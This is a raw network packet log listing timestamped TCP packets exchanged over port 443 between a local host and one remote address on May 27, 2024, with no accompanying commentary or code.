May 27, 2024 18:35:35.304781914 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.304816008 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.304838896 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.304847956 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.304862022 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.304876089 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.305609941 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.305634022 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.305658102 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.305670023 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.305702925 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.306390047 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.306417942 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.306448936 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.306459904 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.306472063 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.307059050 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.307085991 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.307164907 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.307164907 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.307174921 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.308504105 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.308532953 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.308559895 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.308568001 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.308582067 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.308593035 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.393644094 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.393682003 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.393708944 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.393729925 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.393744946 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.393744946 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.394290924 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.394325018 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.394346952 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.394356012 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.394373894 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.394391060 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.394391060 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.394407034 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.394984961 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395018101 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395034075 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.395045996 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395061016 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.395807028 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395859957 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.395868063 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395884991 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.395925999 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.395935059 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.396559954 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.396611929 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.396620989 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.396636009 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.396689892 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.396698952 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.397504091 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.397559881 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.397572041 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.397603035 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.397629976 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.402611017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.402673960 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.402676105 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.402703047 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.402729988 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.402868986 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.402919054 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.402928114 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.402947903 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.403002024 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.403011084 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479053020 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479082108 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479111910 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.479123116 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479136944 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.479172945 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.479566097 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479595900 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479623079 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.479629993 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.479643106 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.479651928 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.480248928 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.480300903 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.480309010 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.480317116 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.480343103 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.481625080 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.481652975 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.481677055 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.481689930 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.481703043 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.481703043 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.482774019 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.482806921 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.482824087 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.482831955 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.482847929 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.482856035 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.483036041 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.483063936 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.483088017 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.483097076 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.483112097 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.484086990 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.484118938 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.484139919 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.484148979 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.484162092 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.484195948 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.485182047 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.485210896 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.485234976 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.485243082 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.485256910 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.485268116 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.566837072 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.566931009 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.566942930 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.566981077 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.567001104 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.567522049 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.567565918 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.567584991 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.567595959 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.567605019 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.567616940 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.567647934 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.568073988 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.568109989 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.568134069 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.568140984 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.568155050 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.569199085 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.569252014 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.569259882 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.569283009 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:35.569506884 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:35.572037935 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.197010994 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.197060108 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.197135925 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.197793961 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.197822094 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.680280924 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.684711933 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.684732914 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848351955 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848480940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848572969 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848659992 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848745108 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848762989 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.848778963 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.848823071 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.848858118 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.849035978 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.849091053 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.849101067 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.849318981 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.849384069 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.849392891 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.852982044 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.853037119 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.853045940 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.937936068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938038111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938047886 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.938060999 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938199043 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.938206911 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938380957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938431978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.938440084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938587904 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938630104 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.938638926 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938738108 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.938781977 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.938790083 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942287922 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942341089 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.942348957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942451000 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942502022 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.942509890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942630053 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942676067 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.942684889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942791939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942842960 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.942852020 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942948103 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.942994118 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.943002939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.943093061 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.943140030 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.943150997 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.943603992 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.943654060 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.943662882 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.983429909 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:36.983494043 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:36.983503103 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.028997898 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029109001 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.029123068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029234886 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029254913 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029289961 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.029299021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029339075 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.029354095 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029371023 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029402018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.029834032 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029855967 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029890060 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.029898882 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.029939890 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.030416012 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.030466080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.030550003 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.030601978 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.031275034 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.031328917 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.031451941 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.031506062 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.032179117 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.032231092 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.032387018 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.032438993 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.032499075 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.032548904 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.033126116 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.033179045 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.033407927 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.033463955 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.074682951 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.074820995 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.074882030 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.074882984 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.074914932 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120157957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120234966 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120265007 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120304108 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120354891 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120366096 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120423079 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120481014 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120490074 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120543957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120589018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120599031 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120645046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120697021 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120706081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120758057 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120805979 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120814085 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120882988 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.120950937 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.120960951 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121201992 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121253014 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.121260881 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121383905 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121433020 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.121440887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121575117 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121629953 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.121638060 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121673107 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121725082 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.121733904 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121923923 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.121973991 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.121982098 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122212887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122268915 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.122277021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122648001 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122694969 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.122703075 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122776031 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.122823954 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.122837067 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123003006 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123064041 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.123071909 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123259068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123311043 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.123320103 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123688936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123742104 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.123749971 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123788118 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123838902 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.123847008 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.123966932 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124013901 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.124023914 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124064922 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124115944 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.124124050 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124547958 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124593973 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.124602079 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124742985 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.124785900 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.124795914 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165275097 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165343046 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.165352106 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165435076 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165488005 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.165496111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165604115 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165622950 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165657043 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.165669918 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165683985 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.165688038 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.165730953 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.165739059 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211081028 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211142063 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.211150885 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211177111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211210012 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.211827993 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211882114 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.211891890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211909056 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.211961985 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.211971045 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.212635994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.212699890 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.212718010 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.212733030 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.212765932 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:37.213534117 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:37.213589907 CEST	49174	443	192.168.2.22	188.114.97.3
